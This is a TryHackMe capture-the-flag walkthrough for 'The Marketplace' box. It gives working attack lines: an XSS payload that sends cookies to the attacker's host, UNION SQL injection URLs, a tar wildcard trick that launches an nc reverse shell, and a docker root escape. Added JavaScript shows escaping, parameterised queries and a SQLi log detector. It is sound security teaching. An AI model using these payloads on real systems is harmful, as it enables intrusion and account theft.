TryHackMe The Marketplace Writeup

Shivam Taneja
5 min read · Oct 15, 2022

This writeup will help you solve The Marketplace box on TryHackMe.com.

TryHackMe The Marketplace — Enumeration

As per usual, we start by scanning for open ports on the box. We do so with the following command:

nmap -sC -sV <box_ip>

We use the flag -sV to detect service version numbers and -sC to run nmap's default NSE scripts against the target. The output is shown below:

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 c8:3c:c5:62:65:eb:7f:5d:92:24:e9:3b:11:b5:23:b9 (RSA)
|   256 06:b7:99:94:0b:09:14:39:e1:7f:bf:c7:5f:99:d3:9f (ECDSA)
|_  256 0a:75:be:a2:60:c6:2b:8a:df:4f:45:71:61:ab:60:b7 (ED25519)
80/tcp    open  http    nginx 1.19.2
| http-robots.txt: 1 disallowed entry
|_/admin
|_http-server-header: nginx/1.19.2
|_http-title: The Marketplace
32768/tcp open  http    Node.js (Express middleware)
| http-robots.txt: 1 disallowed entry
|_/admin
|_http-title: The Marketplace
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

There are only three ports open for us to interact with. Let’s start with the easiest one, port 80. Since this is a webpage without any password protection, we can get some useful information by simply visiting the web page. Browse to http://<box_ip>/.

TryHackMe The Marketplace — Flag 1

We’re met with a pretty simple looking page and only a few options.

Let's start by signing up for an account and then logging in. Two new menu items appear: New listing and Messages.

If we open one of the existing listings from Jake or Michael we find two interesting options: Contact the listing author and Report listing to admins. Contacting someone requires the other party to be online to answer, so we will focus on the report option instead.

Reporting the listing brings us to our messages screen where we find a new message from system. If we refresh this page we see another new message stating the following:

From system

Thank you for your report. We have reviewed the listing and found nothing that violates our rules.

Is there something that will violate their rules and give us a shot at taking over this server?

Yes there is, and its name is Cross-Site Scripting (XSS). For XSS to work we need a place where we can submit our own input and where that input is later rendered, and therefore executed, in another person's or system's browser.

Let’s try to create a new listing. Give it a fun title and fill in the following for the description:

<script> var i = new Image(); i.src="http://<your_ip>/"+document.cookie; </script>

After you’re done, submit your listing.

Now, for the fun part, start a Python web server with the following command and then report your own listing:

python3 -m http.server

Check your web server output and you should see a request like the following:

<box_ip> - - [some_date] "GET /token=aLongTokenThatWeWillBeUsing HTTP/1.1"

Copy this token and use it to replace the value of your own token cookie. Refresh the page and a new menu item called Administration panel appears.

Inside this menu item is our first flag!
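Flag 1 only works because the listing description is rendered unescaped and the session cookie is readable from JavaScript. The following is an added example, not the box's or the author's code, showing the two server-side fixes; escapeHtml, renderListing, sessionCookieHeader and the listing fields are assumed names.

```javascript
// Added example, not The Marketplace's source. Two fixes that each, on their
// own, break the flag-1 chain: escape user text before it lands in HTML, and
// mark the session cookie HttpOnly so a script cannot read document.cookie.
// All names below (escapeHtml, renderListing, sessionCookieHeader) are assumed.

// Escape the five characters that let text break out of an HTML text node or
// a double-quoted attribute value.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Render one listing. Every user-controlled field goes through escapeHtml();
// only our own static markup is emitted raw.
function renderListing(listing) {
  return [
    '<article class="listing">',
    `  <h2>${escapeHtml(listing.title)}</h2>`,
    `  <p>${escapeHtml(listing.description)}</p>`,
    `  <small>posted by ${escapeHtml(listing.author)}</small>`,
    '</article>',
  ].join('\n');
}

// Build the Set-Cookie header for the session token. HttpOnly keeps the
// token out of document.cookie, so even a script that does run cannot
// exfiltrate it; Secure and SameSite=Strict limit where the browser sends it.
function sessionCookieHeader(token) {
  return `token=${encodeURIComponent(token)}; Path=/; HttpOnly; Secure; SameSite=Strict`;
}

// Constructed sample: the exact description payload used in the writeup.
const XSS_PAYLOAD =
  '<script> var i = new Image(); i.src="http://<your_ip>/"+document.cookie; </script>';

// True when the rendered page contains no live <script> tag from the listing.
function payloadIsInert() {
  const html = renderListing({ title: 'Fun title', description: XSS_PAYLOAD, author: 'me' });
  return !html.includes('<script') && html.includes('&lt;script&gt;');
}
```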

TryHackMe The Marketplace — Flag 2

For our second flag we are given the hint that it's located in a file called user.txt. That means we need to find a way onto the server itself, because user.txt lives on the server's filesystem.

Now that we have access to an admin user on The Marketplace, let's see if we can find more vulnerabilities here. Clicking on one of the four user tabs (system, michael, jake and our own user) gives us a very basic info screen. The user is requested through the user= query parameter in the URL. If we replace the number with a single quote ' we get a SQL error, which means the parameter is open to SQL injection!

We start by checking which database we are currently using:

http://<box_ip>/admin?user=1 AND 1=2 union select database(),@@version,1,1

The admin page's query selects four columns, so our UNION must supply four values as well; the trailing 1,1 are padding. After entering this we see User marketplace, meaning the current database schema is called marketplace. Next we figure out which tables exist within the marketplace schema:

http://<box_ip>/admin?user=1 AND 1=2 union select group_concat(table_name),1,1,1 from information_schema.tables where table_schema=database() -- 

Thanks to this injection we find out that there are three tables: items, messages and users.

All that's left is to find the available columns, which we get with the following injection:

http://<box_ip>/admin?user=1 AND 1=2 union select group_concat(column_name),1,1,1 from information_schema.columns where table_schema=database() -- 

Now we have every piece of the puzzle. Let's check whether Michael and Jake had a conversation through their messages:

http://<box_ip>/admin?user=1 AND 1=2 union select message_content,1,2,3 from messages where id=1

We have a hit! An automated message containing an SSH password! We can try this password for Jake:

ssh jake@<box_ip>

After logging in we can find the user.txt file inside our current working directory!
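The user= lookup above is concatenated straight into SQL. As an added example, not the box's or the author's code, here is the bound-parameter form the admin route should use, alongside a small detector that flags the same UNION probes in nginx access-log lines; function names, the users columns, the log format and the sample lines are all assumptions.

```javascript
// Added example, not The Marketplace's source. Two sides of the /admin?user=
// flaw: safeUserQuery() is how the lookup should be built so the UNION
// payloads above never reach MySQL, and flagSqliRequests() scans nginx
// access-log lines for those payloads so the probing shows up in monitoring.
// Function names, column choices, the log format and the sample lines are
// all assumed, not taken from the box.

// Only an integer id is legal here. Refuse anything else before it gets near
// the query, and pass the value as a bound parameter, never as query text.
function safeUserQuery(rawUser) {
  if (!/^\d{1,10}$/.test(String(rawUser))) return null;
  return { sql: 'SELECT * FROM users WHERE id = ?', params: [Number(rawUser)] };
}

// Fragments seen in the injections above, tested against the decoded URL.
const SQLI_MARKERS = [
  /\bunion\s+(all\s+)?select\b/i,
  /\binformation_schema\b/i,
  /\bgroup_concat\s*\(/i,
  /@@version|\bdatabase\s*\(\s*\)/i,
  /\b(and|or)\s+\d+\s*=\s*\d+/i,
];

// Pull the request target out of one nginx combined-format line and decode it.
function requestPath(line) {
  const m = line.match(/"(?:GET|POST|PUT|DELETE)\s+(\S+)\s+HTTP\/[\d.]+"/);
  if (!m) return null;
  try { return decodeURIComponent(m[1].replace(/\+/g, ' ')); } catch (e) { return m[1]; }
}

// Return every log line whose decoded request matches at least one marker.
function flagSqliRequests(logText) {
  return logText.split('\n').filter((line) => {
    const path = requestPath(line);
    return path !== null && SQLI_MARKERS.some((re) => re.test(path));
  });
}

// Constructed sample log: two benign requests and two of the probes above.
const SAMPLE_LOG = [
  '10.0.0.5 - - [15/Oct/2022:10:00:01 +0000] "GET /admin?user=2 HTTP/1.1" 200 512',
  '10.0.0.5 - - [15/Oct/2022:10:00:03 +0000] "GET /admin?user=1%20AND%201=2%20union%20select%20database(),@@version,1,1 HTTP/1.1" 200 530',
  '10.0.0.5 - - [15/Oct/2022:10:00:07 +0000] "GET /admin?user=1%20AND%201=2%20union%20select%20group_concat(table_name),1,1,1%20from%20information_schema.tables%20where%20table_schema=database()%20-- HTTP/1.1" 200 540',
  '10.0.0.9 - - [15/Oct/2022:10:00:09 +0000] "GET /messages HTTP/1.1" 200 300',
].join('\n');
```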

TryHackMe The Marketplace — Flag 3

Our last flag revolves around getting root access. Let's see what our user Jake is allowed to do on the server by executing the following:

sudo -l

We see that Jake can execute a file called /opt/backups/backup.sh as the user Michael. Let’s further investigate this file.

The script runs tar with a shell * wildcard, so any file in the backup directory whose name looks like a tar option is parsed as one (wildcard injection). We can exploit this to get a reverse shell connection back from the server:

jake@the-marketplace:/opt/backup$ echo > --checkpoint=1

jake@the-marketplace:/opt/backup$ echo > '--checkpoint-action=exec=sh shell.sh'

Finally we create a file called shell.sh with the following content:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <your_ip> 1234 >/tmp/f

Give it execution rights by running

chmod +x shell.sh

Open a netcat listener on your local system with

nc -lvnp 1234

Now manually run the backup script with

sudo -u michael /opt/backups/backup.sh

Now we have a reverse shell connection as the user Michael!

First, make our reverse shell more stable by running the following:

python3 -c 'import pty;pty.spawn("/bin/bash")'

export TERM=xterm-256color

Now we can take a look at what we can do as the user Michael. The command id reveals that we belong to the docker group. We can abuse this group membership with the following command:

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

CONCLUSION

It worked! Right now, we’re a root user.

Our last flag is located in the /root directory.

Written by Shivam Taneja

IT Security Consultant, Researcher, Penetration Tester & Hacker.
